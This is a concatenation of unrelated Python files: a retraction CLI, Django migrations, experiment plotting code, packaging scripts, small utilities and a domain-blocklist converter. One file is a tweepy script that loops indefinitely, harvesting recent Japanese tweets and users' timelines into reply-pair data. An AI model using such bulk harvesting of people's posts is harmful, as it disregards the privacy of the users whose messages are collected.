    # `pid in pids` membership tests in retract() O(1) instead of O(n).
    return set(job.result().to_dataframe()['person_id'].to_list())
if __name__ == '__main__':
    # Log at DEBUG level to file and console.
    pipeline_logging.configure(logging.DEBUG, add_console_handler=True)
    parser = argparse.ArgumentParser(
        description=
        'Performs retraction on bucket files for site to retract data for, '
        'determined by hpo_id. Uses project_id, sandbox_dataset_id and '
        'pid_table_id to determine the pids to retract data for. '
        'Folder name is optional. Will retract from all folders for the site '
        'if unspecified. Force flag overrides prompts for each folder.',
        formatter_class=argparse.RawDescriptionHelpFormatter)
    parser.add_argument(
        '-p',
        '--project_id',
        action='store',
        dest='project_id',
        help='Identifies the project containing the sandbox dataset',
        required=True)
    parser.add_argument('-s',
                        '--sandbox_dataset_id',
                        action='store',
                        dest='sandbox_dataset_id',
                        help='Identifies the dataset containing the pid table',
                        required=True)
    parser.add_argument(
        '-t',
        '--pid_table_id',
        action='store',
        dest='pid_table_id',
        help='Identifies the table containing the person_ids for retraction',
        required=True)
    parser.add_argument('-i',
                        '--hpo_id',
                        action='store',
                        dest='hpo_id',
                        help='Identifies the site to retract data from',
                        required=True)
    parser.add_argument(
        '-n',
        '--folder_name',
        action='store',
        dest='folder_name',
        help='Name of the folder to retract from'
        'If set to "none", skips retraction'
        'If set to "all_folders", retracts from all folders by the site',
        required=True)
    parser.add_argument(
        '-f',
        '--force_flag',
        dest='force_flag',
        action='store_true',
        help='Optional. Indicates pids must be retracted without user prompts',
        required=False)
    args = parser.parse_args()
    # bucket/site_bucket are intentionally left to their environment-variable
    # defaults inside run_gcs_retraction.
    run_gcs_retraction(args.project_id, args.sandbox_dataset_id,
                       args.pid_table_id, args.hpo_id, args.folder_name,
                       args.force_flag)
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.1 on 2017-09-02 01:37
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated migration (Django 1.11.1): relaxes
    # Recipe.recipe_description to allow blank values.

    dependencies = [
        ('recipes', '0005_auto_20170627_0052'),
    ]

    operations = [
        migrations.AlterField(
            model_name='recipe',
            name='recipe_description',
            # blank=True permits empty strings in forms/validation.
            field=models.TextField(blank=True),
        ),
    ]
|
from simpleaddress import simpleaddress
# Patch in a data-specific value: map the abbreviation "no." to "N" in
# simpleaddress's replacement table before normalization runs below.
simpleaddress.replacemap["no."]="N"
def parts(address):
    """Split *address* into (house number, street, unit) strings.

    The unit is the trailing " Suite "/" Unit " designation, if any;
    a trailing comma is stripped from the street.
    """
    number, street = address.split(" ", 1)
    unit = ""
    # Peel a suite/unit designation off the end of the street, if present.
    for marker in (" Suite ", " Unit "):
        if marker in street:
            street, sep, tail = street.partition(marker)
            unit = sep.lstrip() + tail
    return number, street.strip(","), unit
# Sample addresses exercising unit suffixes ("Suite") and the patched
# "no." abbreviation above.
addresses="""3-3300 Kuhio Hwy
11400 Highway 99
2909 Austell Rd Sw Suite 100
1334 Flammang Dr
1335 No. Flamingo Ln.""".splitlines()
for address in addresses:
    normal=simpleaddress.normalize(address)
    #~ print(address, normal)
    expand=simpleaddress.expand_streetname(normal)
    #~ print(address, expand)
    number, street, unit=parts(expand)
    # Emit pipe-separated fields: number|street|unit
    print(number, street, unit, sep="|")
# Generated by Django 3.2.5 on 2021-08-05 02:30
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    # Auto-generated migration (Django 3.2.5): introduces the
    # AttendanceRecord table plus lookup indexes on attendee_email and on
    # the entry/exit timestamp pair.

    dependencies = [
        ('core', '0002_auto_20210802_1421'),
    ]

    operations = [
        migrations.CreateModel(
            name='AttendanceRecord',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                # NOTE(review): exit_datetime is non-nullable, so a record
                # cannot represent someone still inside -- confirm intended.
                ('entry_datetime', models.DateTimeField()),
                ('exit_datetime', models.DateTimeField()),
                ('attendee_email', models.CharField(max_length=255)),
                # NOTE(review): the field is named 'room' but targets
                # 'core.building' -- verify the intended model.
                ('room', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='core.building')),
            ],
        ),
        migrations.AddIndex(
            model_name='attendancerecord',
            index=models.Index(fields=['attendee_email'], name='attendee_email_index'),
        ),
        migrations.AddIndex(
            model_name='attendancerecord',
            index=models.Index(fields=['entry_datetime', 'exit_datetime'], name='entry_and_exit_attendee_index'),
        ),
    ]
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
"""
post_process.py: This file is intended to perform some simple post-processing
based on the data files generated by the CMA-ES.
"""
__author__ = 'Sander van Rijn'
__email__ = 's.j.van.rijn@liacs.leidenuniv.nl'
from config import experiment_repetitions, fit_funcs, fit_func_dims, folder_name
from config import suffix, data_ext, plot_ext, data_dir, plot_dir, base_dir
from multiLevelCoSurrogates import guaranteeFolderExists, createsurface, plotsurfaces
from itertools import product
from matplotlib import pyplot as plt
from collections import namedtuple
import numpy as np
import pandas as pd
# Surrogate model types under comparison ('SVM' currently disabled).
surrogates = ['Kriging', 'RBF', 'RandomForest', 'NoSurrogate']  # , 'SVM'
# uses = ['reg', 'EGO-reg', 'MF', 'scaled-MF', 'MF-bisurr', 'scaled-MF-bisurr']
# Surrogate usage strategies currently analysed.
uses = ['reg', 'EGO-reg', 'scaled-MF']
# Generation intervals between surrogate retraining runs.
gen_intervals = [0, 1, 2, 3, 5, 10, 20]
# Pre-training sample-size multipliers (0 = no pre-training).
lambda_pres = [0, 2]  # , 4, 8]
# Default matplotlib figure size (inches).
figsize = (6, 4.5)

# Key identifying a single experiment run in the data dict.
Index = namedtuple('Index', ['fitfunc', 'surrogate', 'usage', 'repetition', 'genint', 'lambda_pre'])
# One row of the timing summary CSV.
TimingData = namedtuple('TimingData', ['function', 'surrogate', 'usage', 'repetition',
                                       'gen_int', 'lambda_pre', 'time'])

# Per-function x-axis limit (high fidelity evaluations) for the plots.
x_lims = {
    'bohachevsky': 100,
    'booth': 250,
    'branin': 500,
    'himmelblau': 500,
    'sixHumpCamelBack': 50,
    'park91a': 500,
    'park91b': 500,
    'borehole': 50,
}
# Per-function z-axis limit; functions without an entry autoscale.
z_lims = {
    'bohachevsky': 75,
    'booth': 1500,
    # 'branin': 1500,
    'himmelblau': 600,
    'sixHumpCamelBack': 150,
}
def interpret_as_slice(column):
    """Interprets the 'column' argument of load_fitnesshistory into a slice()

    :param column: None (all columns), an int (single column), or a pair of
                   ints interpreted as a (start, stop) column range
    :return: equivalent slice object
    :raises ValueError: if 'column' matches none of the accepted formats
    """
    if column is None:  # No specific column is requested, return everything
        return slice(None)
    elif isinstance(column, int):  # One specific column is requested
        return slice(column, column + 1)
    elif len(column) == 2 and all(isinstance(val, int) for val in column):
        # A (start, stop) range of columns is requested
        return slice(*column)
    else:  # 'column' does not match expected format
        # ValueError instead of bare Exception; still caught by existing
        # broad handlers in callers.
        raise ValueError(f"Invalid format for 'column': {column}")
# TODO: replace by regular/proper csv files...
def load_fitnesshistory(fname, column=None):
    """
    Return the data stored in the given filename as float values.
    Optionally, only data from a single, or range of columns can be selected.

    :param fname: The name of the file to retrieve the data from
    :param column: Single or double integer to indicate desired column (optional)
    :return: (Selected) data from the given file in 2D list format
    """
    selection = interpret_as_slice(column)
    rows = []
    with open(fname, 'r') as f:
        next(f)  # Skip the first line which only contains header information
        for line in f:
            rows.append([float(field) for field in line.split(' ')[selection]])
    return rows
# TODO: Rewrite all plotting functions to plot from a list of 'Index' namedtuples
def getdata():
    """Load fitness-history arrays for every experiment combination.

    :return: dict mapping Index tuples to 2-D numpy arrays of fitness
             values, sign-flipped/shifted per function so lower is better
             and the known optimum sits near 0
    """
    fit_func_names = fit_funcs.keys()
    experiments = product(fit_func_names, surrogates, uses,
                          range(experiment_repetitions), gen_intervals, lambda_pres)
    data = {}
    for fit_func_name, surrogate_name, use, rep, gen_int, lambda_pre_mul in experiments:
        idx = Index(fit_func_name, surrogate_name, use, rep, gen_int, lambda_pre_mul)
        ndim = fit_func_dims[fit_func_name]
        lambda_pre = (4 + int(3 * np.log(ndim))) * lambda_pre_mul
        # `use is not 'reg'` compared string identity; use equality instead.
        if surrogate_name == 'NoSurrogate' and use != 'reg':
            continue
        elif use == 'EGO-reg' and surrogate_name not in ['Kriging', 'RandomForest']:
            continue
        fname = folder_name.format(ndim=ndim, func=fit_func_name, use=use, surr=surrogate_name)
        fsuff = suffix.format(size=lambda_pre, rep=rep, gen=gen_int)
        filename_prefix = f'{base_dir}data/{fname}{fsuff}'
        # TODO: better determine optimal values for each function
        try:
            data[idx] = np.array(load_fitnesshistory(f"{filename_prefix}reslog.{data_ext}", column=(1, -1)))
            if fit_func_name == 'borehole':
                data[idx] *= -1  # borehole is maximized: flip the sign
            elif fit_func_name == 'park91b':
                data[idx] -= 0.666666666666  # Manually extracted minimum found value...
            elif fit_func_name == 'branin':
                data[idx] += 320.731611436  # Manually extracted minimum found value...
        except (OSError, ValueError):
            # Missing or unparsable result files are expected; skip them.
            pass
    print("done")
    return data
def timingdatatocsv():
    """Collect per-run timing values and write them to timing_summary.csv.

    Each available timelog file contributes one TimingData row; missing or
    malformed files are skipped.
    """
    fit_func_names = fit_funcs.keys()
    experiments = product(fit_func_names, surrogates, uses,
                          range(experiment_repetitions), gen_intervals, lambda_pres)
    data = []
    for fit_func_name, surrogate_name, use, rep, gen_int, lambda_pre_mul in experiments:
        ndim = fit_func_dims[fit_func_name]
        lambda_pre = (4 + int(3 * np.log(ndim))) * lambda_pre_mul
        # `use is not 'reg'` compared string identity; use equality instead.
        if surrogate_name == 'NoSurrogate' and use != 'reg':
            continue
        elif use == 'EGO-reg' and surrogate_name not in ['Kriging', 'RandomForest']:
            continue
        fname = folder_name.format(ndim=ndim, func=fit_func_name, use=use, surr=surrogate_name)
        fsuff = suffix.format(size=lambda_pre, rep=rep, gen=gen_int)
        filename_prefix = f'{data_dir}{fname}{fsuff}'
        try:
            # In this case, we only ever expect a single value per file
            time = np.array(load_fitnesshistory(f"{filename_prefix}timelog.{data_ext}", column=(1, -1)))[0][0]
            tup = TimingData(fit_func_name, surrogate_name, use, rep, gen_int, lambda_pre_mul, time)
            data.append(tup)
        except (OSError, ValueError, IndexError):
            # Missing, unparsable, or header-only files are skipped.
            pass
    df = pd.DataFrame(data, columns=TimingData._fields)
    df.to_csv(f'{data_dir}timing_summary.csv')
    print("done")
def getplottingvalues(total_data, min_perc=25, max_perc=75):
    """Pad runs to equal length and compute per-step aggregate statistics.

    :param total_data: list of 1-D arrays of per-step fitness values
    :param min_perc: lower percentile for the shaded band
    :param max_perc: upper percentile for the shaded band
    :return: (minimum, mean, median, maximum) arrays, one value per step
    """
    max_len = max(len(dat) for dat in total_data)
    # Pad shorter runs by repeating their final value so rows align.
    new_data = [dat.tolist() + [dat[-1]] * (max_len - len(dat)) for dat in total_data]
    new_data = np.stack(new_data)
    # Workaround to prevent non-positive values (plots use a log scale):
    # replace them with the smallest positive value present.
    if np.min(new_data) <= 0:
        positive = new_data > 0
        if positive.any():
            new_data[~positive] = np.min(new_data[positive])
        # If no positive values exist there is nothing sensible to
        # substitute; leave the data untouched instead of crashing on an
        # unbound minimum (the original code raised NameError here).
    minimum = np.percentile(new_data, min_perc, axis=0)
    mean = np.mean(new_data, axis=0)
    median = np.percentile(new_data, 50, axis=0)
    maximum = np.percentile(new_data, max_perc, axis=0)
    return minimum, mean, median, maximum
def compare_by_genint(data):
    """Create and save plots comparing the median convergence of
    `experiment_repetitions` runs, one line per generation interval, for
    each (fitness function, surrogate, use) combination.

    :param data: dict of Index -> 2-D fitness-history arrays (see getdata)
    """
    fit_func_names = fit_funcs.keys()
    np.set_printoptions(precision=3, linewidth=2000)
    for fit_func_name, surrogate_name, use in product(fit_func_names, surrogates, uses):
        if fit_func_name == 'himmelblau_seb':
            continue
        # `use is not 'reg'` compared string identity; use equality instead.
        if surrogate_name == 'NoSurrogate' and use != 'reg':
            continue
        elif use == 'EGO-reg' and surrogate_name not in ['Kriging', 'RandomForest']:
            continue
        plt.figure(figsize=figsize)
        num_plotted = 0
        for gen_int, lambda_pre in product(gen_intervals, lambda_pres):
            total_data = []
            for rep in range(experiment_repetitions):
                idx = Index(fit_func_name, surrogate_name, use, rep, gen_int, lambda_pre)
                try:
                    dat = data[idx]
                except KeyError:
                    # No stored results for this repetition; skip it.
                    continue
                try:
                    # Best-so-far fitness per generation.
                    dat = np.ma.masked_invalid(dat).min(axis=1)
                    dat = np.minimum.accumulate(dat)
                    total_data.append(dat)
                except Exception:
                    print(idx)
                    print(dat)
            if not total_data:
                continue
            minimum, mean, median, maximum = getplottingvalues(total_data)
            plt.plot(median, label='g_int='+str(gen_int))
            plt.fill_between(np.arange(len(minimum)), minimum, maximum, interpolate=True, alpha=0.2)
            num_plotted += 1
        if num_plotted <= 1:
            # Fewer than two lines -> nothing to compare; drop the figure.
            plt.close()
            continue
        guaranteeFolderExists(f'{plot_dir}by_genint/')
        plt.title(f'{fit_func_name}')
        plt.xlabel('High Fidelity Evaluations')
        plt.xlim(0, x_lims[fit_func_name])
        plt.ylabel('Fitness value')
        plt.yscale('log')
        plt.legend(loc=0)
        plt.tight_layout()
        plt.savefig(f"{plot_dir}by_genint/{fit_func_name}-{surrogate_name}-{use}.{plot_ext}")
        plt.close()
    print("all plotted")
def compare_by_use(data):
    """Create and save plots comparing the median convergence of `experiment_repetitions`
    runs for various uses of each surrogate.

    One figure is produced per (fitness function, generation interval)
    combination, with one line per (surrogate, use) pair, saved under
    ``{plot_dir}by_use/``.

    :param data: mapping from ``Index`` tuples to per-run fitness arrays.
    :returns: None (figures are written to disk).
    """
    fit_func_names = fit_funcs.keys()
    np.set_printoptions(precision=3, linewidth=2000)
    for fit_func_name, gen_int_ in product(fit_func_names, gen_intervals):
        if fit_func_name == 'himmelblau_seb':
            continue
        plt.figure(figsize=figsize)
        num_plotted = 0
        for surrogate_name, use, lambda_pre, gen_int in product(surrogates, uses, lambda_pres, [gen_int_]):
            total_data = []
            # FIX: was `use is not 'reg'` -- identity comparison with a
            # string literal is implementation-dependent; value equality
            # is what is meant here.
            if surrogate_name == 'NoSurrogate' and use != 'reg':
                continue
            elif use == 'EGO-reg' and surrogate_name not in ['Kriging', 'RandomForest']:
                continue
            for rep in range(experiment_repetitions):
                try:
                    idx = Index(fit_func_name, surrogate_name, use, rep, gen_int, lambda_pre)
                    dat = data[idx]
                except KeyError:
                    # This repetition was not run / not recorded; skip it.
                    # (Was a bare `except:`, which also hid real errors.)
                    continue
                try:
                    # Best fitness per generation, then running best-so-far.
                    dat = np.ma.masked_invalid(dat).min(axis=1)
                    dat = np.minimum.accumulate(dat)
                    total_data.append(dat)
                except Exception as e:
                    print(idx)
                    print(dat)
            if not total_data:
                continue
            minimum, mean, median, maximum = getplottingvalues(total_data)
            plt.plot(median, label=f'{surrogate_name} - {"c" if use != "reg" else ""}SA-CMA-ES')
            plt.fill_between(np.arange(len(minimum)), minimum, maximum, interpolate=True, alpha=0.2)
            num_plotted += 1
        # A figure with a single line is not a comparison; discard it.
        if num_plotted <= 1:
            plt.close()
            continue
        guaranteeFolderExists(f'{plot_dir}by_use/')
        plt.title(f'{fit_func_name}')
        plt.xlabel('High Fidelity Evaluations')
        plt.xlim(0, x_lims[fit_func_name])
        plt.ylabel('Fitness value')
        plt.yscale('log')
        plt.legend(loc=0)
        plt.tight_layout()
        plt.savefig(f"{plot_dir}by_use/{fit_func_name}--{str(gen_int_)}.{plot_ext}")
        plt.close()
    print("all plotted")
def compare_by_surrogate(data):
    """Create and save plots comparing the median convergence of `experiment_repetitions`
    runs for the various surrogates.

    One figure is produced per (fitness function, use, generation interval)
    combination, with one line per surrogate (at gen_int 0 and gen_int_),
    saved under ``{plot_dir}by_surrogate/``.

    :param data: mapping from ``Index`` tuples to per-run fitness arrays.
    :returns: None (figures are written to disk).
    """
    fit_func_names = fit_funcs.keys()
    np.set_printoptions(precision=3, linewidth=2000)
    for fit_func_name, use, gen_int_ in product(fit_func_names, uses, gen_intervals):
        if fit_func_name == 'himmelblau_seb':
            continue
        plt.figure(figsize=figsize)
        num_plotted = 0
        for surrogate_name, lambda_pre, gen_int in product(surrogates, lambda_pres, [0, gen_int_]):
            total_data = []
            if use == 'EGO-reg' and surrogate_name not in ['Kriging', 'RandomForest']:
                continue
            for rep in range(experiment_repetitions):
                try:
                    idx = Index(fit_func_name, surrogate_name, use, rep, gen_int, lambda_pre)
                    dat = data[idx]
                except KeyError:
                    # This repetition was not run / not recorded; skip it.
                    # (Was a bare `except:`, which also hid real errors.)
                    continue
                try:
                    # Best fitness per generation, then running best-so-far.
                    dat = np.ma.masked_invalid(dat).min(axis=1)
                    dat = np.minimum.accumulate(dat)
                    total_data.append(dat)
                except Exception as e:
                    print(idx)
                    print(dat)
            if not total_data:
                continue
            minimum, mean, median, maximum = getplottingvalues(total_data)
            plt.plot(median, label=f'{surrogate_name}')
            plt.fill_between(np.arange(len(minimum)), minimum, maximum, interpolate=True, alpha=0.2)
            num_plotted += 1
        # A figure with a single line is not a comparison; discard it.
        if num_plotted <= 1:
            plt.close()
            continue
        guaranteeFolderExists(f'{plot_dir}by_surrogate/')
        plt.title(f'{fit_func_name}')
        plt.xlabel('High Fidelity Evaluations')
        plt.xlim(0, x_lims[fit_func_name])
        plt.ylabel('Fitness value')
        plt.yscale('log')
        plt.legend(loc=0)
        plt.tight_layout()
        # FIX: was `gen_int` -- relying on the leaked inner-loop variable;
        # use the figure-level interval explicitly (same final value, but
        # no longer depends on loop-variable leakage).
        plt.savefig(f"{plot_dir}by_surrogate/{fit_func_name}-{use}-{str(gen_int_)}.{plot_ext}")
        plt.close()
    print("all plotted")
def make2dvisualizations(func, l_bound, u_bound, name, num_intervals=200):
    """Evaluate `func` over [l_bound, u_bound] as a surface and save the plot.

    The plot is written to ``{plot_dir}surfaces/{name}.{plot_ext}`` and also
    shown on screen.
    """
    step_size = (u_bound - l_bound) / num_intervals
    surf = createsurface(func, l_bound, u_bound, step=step_size)
    plotsurfaces(
        [surf],
        titles=[name],
        figratio=(6, 4),
        save_as=f'{plot_dir}surfaces/{name}.{plot_ext}',
        show=True,
    )
def plot_function_surfaces():
    """Create and save surface plots for the 'himmelblau' fitness function:
    its high- and low-fidelity versions and their difference."""
    # for name, fit_func in list(fit_funcs.items())[:5]:
    #
    #     #TODO: make bounds np.arrays in the function package?
    #     l_bound = np.array(fit_func.l_bound, dtype=np.float64)
    #     u_bound = np.array(fit_func.u_bound, dtype=np.float64)
    #
    #     for fid in fit_func.fidelity_names:
    #         func = getattr(fit_func, fid)
    #         make2dvisualizations(func, l_bound, u_bound, '_'.join((name, fid)))
    guaranteeFolderExists(f'{plot_dir}surfaces/')
    fit_func = fit_funcs['himmelblau']
    l_bound = np.array(fit_func.l_bound, dtype=np.float64)
    u_bound = np.array(fit_func.u_bound, dtype=np.float64)
    high = createsurface(fit_func.high, l_bound, u_bound)
    low = createsurface(fit_func.low, l_bound, u_bound)
    diff = high - low
    # NOTE(review): `surf` is an already-evaluated surface here, but
    # make2dvisualizations forwards its first argument to createsurface as
    # if it were a callable -- confirm createsurface also accepts
    # precomputed surfaces.
    for surf, name in zip([high, low, diff], ['high', 'low', 'diff']):
        make2dvisualizations(surf, l_bound, u_bound, f'himmelblau_{name}')
def run():
    """Entry point: load the experiment data and produce every comparison plot."""
    data = getdata()
    compare_by_use(data)
    compare_by_genint(data)
    compare_by_surrogate(data)
    plot_function_surfaces()
    # timingdatatocsv()


if __name__ == '__main__':
    run()
|
import pandas as pa
import plotly
import plotly.graph_objects as go
# NOTE(review): hard-coded absolute Windows path -- only runs on this machine.
path_random = r'C:\Users\AL\Desktop\test\test.csv'
test_data_df = pa.read_csv(path_random)
# In a plain script (outside a notebook) this .head() result is discarded.
test_data_df.head()
# trace0 = Scatter(x=[1,2,3,4], y=[1,2,3,4])
# trace1 = Scatter(x=[1,2,3,4], y=[5,6,7,8])
# data = [trace0, trace1]
# plotly.offline.plot(data, filename='tfh.html')
# Donut chart (hole=0.2): slice labels come from the DataFrame's row index,
# values from the 'score' column -- presumably the CSV's first column is the
# label; verify against the actual file.
trace = [go.Pie(labels=test_data_df.index.tolist(), values=test_data_df.score.tolist(), hole=0.2)]
fig = go.Figure(data=trace)
# Render the figure to an offline HTML file and open it.
pyplot = plotly.offline.plot
pyplot(fig)
|
import tweepy
import random
import re
# Endless collection loop: each iteration harvests one batch of Japanese
# tweet reply pairs and appends them to tweet_pairs.txt.
while True:
    # Enter the API keys and tokens obtained earlier here.
    api_key = ""
    api_secret_key = ""
    access_token = ""
    access_token_secret = ""
    auth = tweepy.OAuthHandler(api_key, api_secret_key)
    auth.set_access_token(access_token, access_token_secret)
    api = tweepy.API(auth_handler=auth, wait_on_rate_limit=True)
    # List common client names so that bot tweets can be excluded.
    sources = ["TweetDeck", "Twitter Web Client", "Twitter for iPhone",
               "Twitter for iPad", "Twitter for Android", "Twitter for Android Tablets",
               "ついっぷる", "Janetter", "twicca", "Keitai Web", "Twitter for Mac"]
    # Search for a single random hiragana character and collect screen names.
    words = list("あいうえおかきくけこさしすせそたちつてとなにぬねのはひふへほまみむめもやゆよらりるれろわをん")
    screen_names = set()
    for s in api.search(q=random.choice(words), lang='ja', result_type='recent', count=100, tweet_mode='extended'):
        if s.source in sources:
            screen_names.add(s.author.screen_name)
    # dict mapping status id -> status object.
    id2status = {}
    # Fetch each user's timeline and store their tweets; additionally, for
    # reply tweets, record the screen name that was replied to.
    in_reply_to_screen_names = set()
    for name in screen_names:
        try:
            for s in api.user_timeline(name, tweet_mode='extended', count=200):
                # Exclude tweets that contain links or hashtags.
                if "http" not in s.full_text and "#" not in s.full_text:
                    id2status[s.id] = s
                    if s.in_reply_to_screen_name is not None:
                        if s.in_reply_to_screen_name not in screen_names:
                            in_reply_to_screen_names.add(s.in_reply_to_screen_name)
        except Exception as e:
            # Protected/suspended accounts etc. -- skip this user.
            continue
    # Fetch the timelines of the replied-to users and store their tweets too.
    for name in in_reply_to_screen_names:
        try:
            for s in api.user_timeline(name, tweet_mode='extended', count=200):
                if "http" not in s.full_text and "#" not in s.full_text:
                    id2status[s.id] = s
        except Exception as e:
            continue
    # Where both ends of a reply pair were stored, map the id of the tweet
    # that was replied to -> the id of the reply.
    id2replyid = {}
    for _, s in id2status.items():
        if s.in_reply_to_status_id in id2status:
            id2replyid[s.in_reply_to_status_id] = s.id
    # Look up both statuses for every pair and append them, tab-separated.
    f = open("tweet_pairs.txt", "a")
    for id, rid in id2replyid.items():
        # Replace newlines with spaces.
        tweet1 = id2status[id].full_text.replace("\n", " ")
        # Strip leading @screen_name mentions with a regex.
        tweet1 = re.sub(r"@[0-9a-zA-Z_]{1,15} +", "", tweet1)
        tweet2 = id2status[rid].full_text.replace("\n", " ")
        tweet2 = re.sub(r"@[0-9a-zA-Z_]{1,15} +", "", tweet2)
        f.write(tweet1+ "\t" + tweet2 + "\n")
    f.close()
    print("Write " + str(len(id2replyid)) + " pairs.")
    # Save tweet triples, tab-separated (disabled).
    # f = open("tweet_triples.txt", "a")
    # for id, rid in id2replyid.items():
    #     if rid in id2replyid:
    #         tweet1 = id2status[id].full_text.replace("\n", " ")
    #         tweet1 = re.sub(r"@[0-9a-zA-Z_]{1,15} +", "", tweet1)
    #         tweet2 = id2status[rid].full_text.replace("\n", " ")
    #         tweet2 = re.sub(r"@[0-9a-zA-Z_]{1,15} +", "", tweet2)
    #         tweet3 = id2status[id2replyid[rid]].full_text.replace("\n", " ")
    #         tweet3 = re.sub(r"@[0-9a-zA-Z_]{1,15} +", "", tweet3)
    #         f.write(tweet1 + " SEP " + tweet2 + "\t" + tweet3 + "\n")
    # f.close()
|
#!/usr/bin/env python3
# Packaging metadata for the 'py-mgr' distribution (setuptools).
from setuptools import setup
# from distutils.core import setup

# Use the README as the PyPI long description.
with open('README.md') as f:
    long_description = f.read()

setup(
    name = 'py-mgr',
    packages = ['py_mgr'],
    version = '0.0.9',
    description = 'administration of modules and plugin',
    long_description=long_description,
    long_description_content_type='text/markdown',  # This is important!
    url = 'https://github.com/FlavioLionelRita/py-mgr',  # use the URL to the github repo
    download_url = 'https://github.com/FlavioLionelRita/py-mgr/tarball/0.0.9',
    keywords = ['manager', 'plugin'],
    classifiers = [],
    author = 'Flavio Lionel Rita',
    author_email = 'flaviolrita@hotmail.com'
)
|
from setuptools import setup, find_packages
# Minimal packaging metadata for the coinmarket scraper.
# NOTE(review): find_packages is imported above but unused; packages are
# listed explicitly instead.
setup(
    name='coinmarket-scraper',
    version='0.0.1',
    author='avery bostick',
    packages=['src','tests'],
)
def find_min_max(nums):
    """Return a ``(minimum, maximum)`` tuple for the sequence *nums*.

    Single linear scan.  The original version indexed ``nums[1]``
    unconditionally and therefore crashed on sequences with fewer than two
    elements; this version handles any non-empty sequence.

    :param nums: non-empty sequence of mutually comparable values.
    :returns: tuple ``(minimum, maximum)``.
    :raises ValueError: if *nums* is empty.
    """
    if not nums:
        raise ValueError("find_min_max() requires a non-empty sequence")
    # Avoid shadowing the builtins `min`/`max` (the original did).
    smallest = largest = nums[0]
    for value in nums[1:]:
        if value < smallest:
            smallest = value
        elif value > largest:
            largest = value
    return (smallest, largest)
def main():
    """Demo entry point: print the (min, max) of a sample list."""
    sample = [3, 5, 1, 2, 4, 8]
    print(find_min_max(sample))


if __name__ == "__main__":
    main()
# Print the length of the longest run of identical consecutive characters
# in the input line (1 for empty or single-character input).
text = list(input())
best = 1
run = 1
for prev, cur in zip(text, text[1:]):
    if prev == cur:
        run += 1
        if run > best:
            best = run
    else:
        run = 1
print(best)
import json
import sys
from collections import OrderedDict, defaultdict
from datetime import date
from pathlib import Path
from typing import Dict, List
class DomainBlocklistConverter:
    """Convert the flat `pihole-google.txt` domain list into several
    blocklist flavours (Pi-hole, Unbound, AdGuard, per-category files).

    The input file groups domains under `# category` header lines;
    :meth:`read` parses it into ``self.data``, and the other methods render
    that mapping into the respective output formats.
    """

    INPUT_FILE = "pihole-google.txt"            # source list, categories as '# ...' headers
    PIHOLE_FILE = "google-domains"              # Pi-hole hosts-style output
    UNBOUND_FILE = "pihole-google-unbound.conf" # Unbound local-zone output
    ADGUARD_FILE = "pihole-google-adguard.txt"  # AdGuard filter output
    CATEGORIES_PATH = "categories"              # directory for per-category files
    BLOCKLIST_ABOUT = "This blocklist helps to restrict access to Google and its domains. Contribute at https://github.com/nickspaargaren/no-google"

    def __init__(self):
        # Category name -> list of domains, preserving input order.
        # (Annotation fixed: typing.Dict requires both key and value types.)
        self.data: Dict[str, List[str]] = OrderedDict()
        # Date stamp written into every generated file header.
        self.timestamp: str = date.today().strftime("%Y-%m-%d")

    def read(self):
        """
        Read input file into `self.data`, a dictionary mapping category names to lists of member items.
        """
        with open(self.INPUT_FILE, "r") as f:
            category = None
            for line in f:
                line = line.strip()
                if line.startswith("#"):
                    # '# Category name' header starts a new (or existing) group.
                    category = line.lstrip("# ")
                    self.data.setdefault(category, [])
                else:
                    if category is None:
                        raise ValueError("Unable to store item without category")
                    self.data[category].append(line)

    def dump(self):
        """
        Output data in JSON format on STDOUT.
        """
        print(json.dumps(self.data, indent=4))

    def pihole(self):
        """
        Produce blocklist for the Pi-hole.
        """
        with open(self.PIHOLE_FILE, "w") as f:
            f.write(f"# {self.BLOCKLIST_ABOUT}\n")
            f.write(f"# Last updated: {self.timestamp}\n")
            for category, entries in self.data.items():
                f.write(f"# {category}\n")
                for entry in entries:
                    # hosts-file style: resolve each domain to 0.0.0.0
                    f.write(f"0.0.0.0 {entry}\n")

    def unbound(self):
        """
        Produce blocklist for the Unbound DNS server.
        https://github.com/nickspaargaren/no-google/issues/67
        """
        with open(self.UNBOUND_FILE, "w") as f:
            f.write(f"# {self.BLOCKLIST_ABOUT}\n")
            f.write(f"# Last updated: {self.timestamp}\n")
            for category, entries in self.data.items():
                f.write(f"\n# Category: {category}\n")
                for entry in entries:
                    f.write(f'local-zone: "{entry}" always_refuse\n')

    def adguard(self):
        """
        Produce blocklist for AdGuard.
        """
        with open(self.ADGUARD_FILE, "w") as f:
            # AdGuard uses '!' as its comment marker.
            f.write(f"! {self.BLOCKLIST_ABOUT}\n")
            f.write(f"! Last updated: {self.timestamp}\n")
            for category, entries in self.data.items():
                f.write(f"! {category}\n")
                for entry in entries:
                    f.write(f"||{entry}^\n")

    def categories(self):
        """
        Produce individual per-category blocklist files.
        """
        def write_file(path, category, entries, line_prefix=""):
            """
            Generic function to write per-category file in both flavours.
            """
            with open(path, "w") as f:
                f.write(f"# {self.BLOCKLIST_ABOUT}\n")
                f.write(f"# Last updated: {self.timestamp}\n")
                f.write(f"# {category}\n")
                f.write(f"\n")
                for entry in entries:
                    f.write(f"{line_prefix}{entry}\n")

        for category, entries in self.data.items():
            # Compute file names.
            filename = category.replace(" ", "").lower()
            filepath = Path(self.CATEGORIES_PATH).joinpath(filename)
            text_file = filepath.with_suffix(".txt")
            parsed_file = str(filepath) + "parsed"
            # Write two flavours of per-category file.
            write_file(text_file, category, entries, line_prefix="0.0.0.0 ")
            write_file(parsed_file, category, entries)

    def duplicates(self):
        """
        Find duplicates in main source file.
        """
        # First pass: count occurrences of each entry (keyed by hash).
        hashes = defaultdict(int)
        for category, entries in self.data.items():
            for entry in entries:
                hashes[hash(entry)] += 1
        # Second pass: report each duplicated entry once, then zero its count.
        for category, entries in self.data.items():
            for entry in entries:
                hashvalue = hash(entry)
                if hashvalue in hashes:
                    count = hashes[hashvalue]
                    if count > 1:
                        print(
                            f"Domain {entry} found {count} times, please remove duplicate domains."
                        )
                    hashes[hashvalue] = 0
def run(action: str):
    """
    Invoke different actions on converter engine.

    :param action: a converter method name ("pihole", "unbound", "adguard",
        "categories", "duplicates"), "json" to dump the parsed data, or
